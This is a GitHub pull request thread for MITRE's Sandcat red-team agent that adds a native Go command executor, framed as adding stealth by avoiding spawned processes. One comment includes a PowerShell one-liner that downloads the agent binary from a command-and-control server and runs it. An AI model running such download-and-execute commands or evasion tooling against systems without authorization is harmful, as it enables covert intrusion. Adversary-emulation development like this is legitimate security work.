Native executor and basic ls method
mitre/sandcat pull request #388
Opened 2021-12-21 13:01 UTC by uruwhy

## Description
Native executor for Sandcat agent - rather than rely on pre-existing executables or using psh/sh/cmd, create an extension that uses native golang functions to execute commands. The native executor will support a variety of commands, such as listing directories, listing processes, etc. This will provide added stealth by avoiding spawning unnecessary processes.

## Type of change
- [x] New feature (non-breaking change which adds functionality)
- [x] This change requires a documentation update

## How Has This Been Tested?
WIP

## Checklist:

- [ ] My code follows the style guidelines of this project
- [ ] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works

2021-12-30 20:22 UTC, cyber-arsenull commented
Had success when running a hand built sandcat agent, after copying in native files from `gocat-extensions`. 
However, I don't see a way to get it to include these when built through the server. Would `native` need to be added to the variation dict in `sand_svc.py`?
Something like:
```
gocat_variants = dict(
    basic=set(),
    red=set(['gist', 'shared', 'shells', 'shellcode', 'native'])
)
default_gocat_variant = 'basic'
```

2021-12-31 00:21 UTC, cyber-arsenull requested changes
Had success when running a hand built sandcat agent, after copying in native files from `gocat-extensions`. 
However, I don't see a way to get it to include these when built through the server. 
@uruwhy  Would `native` need to be added to the variation dict in `sand_svc.py`?
Something like:
```
gocat_variants = dict(
    basic=set(),
    red=set(['gist', 'shared', 'shells', 'shellcode', 'native'])
)
default_gocat_variant = 'basic'
```

2021-12-31 00:21 UTC, cyber-arsenull commented on gocat-extensions/execute/native/util/native_util.go
> +type NativeCmdResult struct {
All of this stuff feels more like core native support rather than utils. Is it not possible to bring this up into `native.go`?
Wondering if your reasoning was because of import chains or some other gotcha

2022-01-03 14:16 UTC, uruwhy commented on gocat-extensions/execute/native/util/native_util.go
> +type NativeCmdResult struct {
Import chains - this way I get to keep all the `_ "github.com/mitre/gocat/execute/native/discovery"` submodule imports within `native.go` and not within some other core file like `execute.go`

2022-01-03 14:19 UTC, uruwhy commented
> Had success when running a hand built sandcat agent, after copying in native files from `gocat-extensions`. However, I don't see a way to get it to include these when built through the server. @uruwhy Would `native` need to be added to the variation dict in `sand_svc.py`? Something like:
> 
> ```
> gocat_variants = dict(
>     basic=set(),
>     red=set(['gist', 'shared', 'shells', 'shellcode', 'native'])
> )
> default_gocat_variant = 'basic'
> ```

Ah, so when you want to compile an agent with a particular extension, you pass in the `gocat-extensions` HTTP header, and the corresponding header will have the extension name (e.g. `native`). If you want multiple extensions, you can pass in a comma-separated string as the HTTP header value. The sandcat plugin service will handle copying the required files, compiling the agent, and then removing the copied files for you.

E.g. 
```
$url="http://192.168.137.1:8888/file/download"; 
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows"); 
$wc.Headers.add("file","sandcat.go"); 
$wc.Headers.add("gocat-extensions","native");  # this is where you specify the extension
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output); 
C:\Users\Public\sandcat.exe -server http://192.168.137.1:8888 -v;
```

2022-01-14 22:19 UTC, clenk commented on gocat-extensions/execute/native/util/native_util.go
> +type NativeCmdResult struct {
`/native/util/native_util.go` feels redundant - would it work if it was `/native/util.go`?

2022-01-14 22:20 UTC, uruwhy commented on gocat-extensions/execute/native/util/native_util.go
> +type NativeCmdResult struct {
I don't see why not - I can make that change

2022-01-18 22:26 UTC, clenk approved these changes

2022-01-18 22:50 UTC, cyber-arsenull approved these changes
LGTM! Really excited for new native capabilities.

2022-01-18 22:50 UTC, merged